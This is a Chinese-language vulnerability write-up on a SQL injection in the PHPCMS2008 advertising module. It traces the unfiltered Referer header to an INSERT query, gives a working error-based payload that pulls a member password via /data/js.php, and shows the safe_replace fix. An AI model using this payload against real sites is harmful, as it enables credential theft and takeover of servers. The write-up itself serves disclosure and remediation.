00 漏洞描述
PHPCMS2008由於廣告模塊取referer不嚴,導致一處sql注入漏洞.可以得到管理員用戶名與密碼,攻擊者登錄後台後可能會獲取webshell,對服務器進行進一步的滲透。
01 漏洞分析
漏洞產生的位置:
/ads/include/ads_place.class.php的show方法中.
function show($placeid)
...
if($adses[0]['option'])
{
foreach($adses as $ads)
{
$contents[] = ads_content($ads, 1);
$this->db->query(“INSERT INTO$this->stat_table(`adsid`,`username`,`ip`,`referer`,`clicktime`,`type`)VALUES (‘$ads[adsid]','$_username','$ip',‘$this->referrer',‘$time',,'0')”);
$template = $ads['template'] ? $ads['template'] : 'ads';
}
}
...
sql語句中
$this->db->query(“INSERT INTO$this->stat_table(`adsid`,`username`,`ip`,`referer`,`clicktime`,`type`)VALUES (‘$ads[adsid]','$_username','$ip',‘$this->referrer',‘$time',,'0')”);
這裡$this->referrer通過this方法直接將HTTP請求頭中的referer字段插入到數據庫中,沒有做任何過濾措施。(這個this方法是PHPCMS裡面直接封裝的)。
所以現在已經找到漏洞點,下一步就是找包含漏洞的用戶可控的頁面。如果漏洞是用戶不可控的,比如只能管理員利用,那就相當的雞肋了。
這裡使用回溯的方法,看看哪些頁面調用了它。
頁面/ads/include/commom.inc.php
<?php ... require MOD_ROOT.'include/ads_place.class.php'; require MOD_ROOT.'include/ads.class.php'; ... ?>
在往上看看誰調用了/ads/include/commom.inc.php
/ads/ad.php文件中
<?php ... require './include/common.inc.php'; ... ?>
ad.php文件為用戶可控文件,但ad.php有時不能訪問,繼續向上查找/data/js.php
<?php chdir(‘../ads/'); require ‘./ad.php'; ?>
在用戶訪問首頁時,會調用js.php,通過該文件可以提交有害字段,然後通過逐層調用,傳入字段referer到危險方法show,引入SQL注入攻擊。
02 漏洞利用
修改請求頭中的referer字段的話有很多種,比如burpsuite,Tamper Data…
這裡直接使用火狐的Tamper Data進行修改:
點擊Start Tamper,然後訪問http://your-addr/data/js.php?id=1
這時候Tamper Data會跳出來,在右邊框內,點擊右鍵,添加一個element值填寫payload
referer=1', (SELECT 1 FROM (select count(*), concat(floor(rand(0)*2),char(45,45,45),(SELECT password from phpcms_member limit 1))a from information_schema.tables group by a)b), ‘0')#
這裡我解釋一下:因為漏洞的sql語句是INSERT是不回顯的,所以可以使用盲注,這裡的payload使用的floor報錯注入。floor報錯注入原理請參考:floor函數用法
把這個payload帶入sql語句中是:
$this->db->query(“INSERT INTO$this->stat_table(`adsid`,`username`,`ip`,`referer`,`clicktime`,`type`)VALUES (‘$ads[adsid]','$_username','$ip',‘1',‘$time',(SELECT 1 FROM (select count(*), concat(floor(rand(0)*2),char(45,45,45),(SELECT password from phpcms_member limit 1))a from information_schema.tables group by a)b), ‘0')#,'0')”);
03 漏洞修復
對相關字段進行過濾處理。
$referer = safe_replace($this->referer);
$this->db->query("INSERT INTO $this->stat_table (`adsid`, `username`, `ip`, `referer`, `clicktime`, `type`) VALUES ('$ads[adsid]', '$_username', '$ip', '$referer', '$time', '0')");
$template = $ads['template'] ? $ads['template'] : 'ads';
這裡safe_replace是PHPCMS2008封裝的過濾函數。
以上所述是小編給大家介紹的PHPCMS2008廣告模板SQL注入漏洞,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復大家的。在此也非常感謝大家對幫客之家網站的支持!
